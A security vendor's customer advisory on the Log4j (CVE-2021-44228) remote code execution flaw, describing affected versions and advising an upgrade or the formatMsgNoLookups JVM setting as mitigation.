Log4j / High Severity Zero-Day Vulnerability

CVE-2021-44228 – Log4j

12.16.21

Update and Resources

This communication provides relevant updates and resources that clients should be aware of regarding the Log4j security flaw.

Binary Defense MDR is NOT IMPACTED by this vulnerability.

Binary Defense and our sister company TrustedSec have collaborated to provide guidance about Log4j in the blogs and webcast linked below. For convenience, we have also included Log4j direction from our SIEM partners.

As an extension to your security team, we expect to confidently get through this recent vulnerability together. If you need any additional assistance, please contact our Customer Success team.

Jen Campbell
Customer Success Manager
jen.campbell@binarydefense.com

Binary Defense and TrustedSec Resources:

SIEM Partner Resources:


High Severity Zero-Day Vulnerability

CVE-2021-44228 Affects Apache Log4j

12.10.21

A new zero-day vulnerability that was recently found to be affecting the popular Java logging library Apache Log4j is already being exploited in the wild, with a POC released publicly on GitHub. This vulnerability allows for unauthenticated remote code execution that could allow for full control of servers. Not only are versions 2.0 through 2.14.1 of Log4j at risk, but some Java programs are likely to be affected as well. Researchers from LunaSec wrote a blog post stating “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.”

Analyst Notes:

Researchers have advised that organizations using the affected versions of Apache Log4j investigate for possible compromise. It is also advised to upgrade to log4j-2.15.0-rc1 as soon as possible. If immediate patching is not possible, researchers have developed a temporary mitigation that can be applied:

The following parameter should be set to true when starting the Java Virtual Machine:

log4j2.formatMsgNoLookups

By adding:

“Dlog4j2.formatMsgNoLookups=True”

Analysis for this vulnerability is ongoing as more information is discovered.

For Binary Defense MDR and SIEM customers, we are actively monitoring the situation and the SOC is operating at a higher level of vigilance while looking for post exploitation scenarios related to this exposure.

Sources:

https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/

https://www.randori.com/blog/cve-2021-44228

https://www.lunasec.io/docs/blog/log4j-zero-day/